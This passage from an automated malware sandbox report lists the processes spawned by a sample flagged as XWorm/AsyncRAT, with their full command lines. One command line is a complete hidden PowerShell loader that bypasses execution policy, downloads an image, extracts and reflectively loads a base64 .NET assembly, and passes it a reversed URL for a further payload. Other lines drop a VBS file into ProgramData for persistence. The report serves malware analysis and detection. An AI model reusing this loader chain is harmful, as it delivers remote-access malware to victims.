wDgTrebDgTreBhDgTreHIDgTreJwDgTresDgTreCcDgTreUgBlDgTreGcDgTreQQBzDgTreG0DgTreJwDgTresDgTreCcDgTreJwDgTrepDgTreCkDgTrefQDgTregDgTreH0DgTre';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD"
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	4
Start time:	09:48:16
Start date:	04/05/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	7
Start time:	09:48:36
Start date:	04/05/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links \| Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029', 'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.yamowx/mn/moc.72evlove.www//:sptth' , '1' , 'C:\ProgramData\' , 'escudellar','RegAsm',''))} }"
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	8
Start time:	09:48:53
Start date:	04/05/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /C copy *.vbs "C:\ProgramData\escudellar.vbs"
Imagebase:	0x2b0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	9
Start time:	09:48:53
Start date:	04/05/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	10
Start time:	09:48:56
Start date:	04/05/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0xed0000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000000A.00000002.2972228650.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000000A.00000002.2972228650.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	high
Has exited:	false

Target ID:	11
Start time:	09:49:06
Start date:	04/05/2024
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WScript.exe" "C:\ProgramData\escudellar.vbs"
Imagebase:	0x7ff66a720000
File size:	170'496 bytes
MD5 hash:	A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true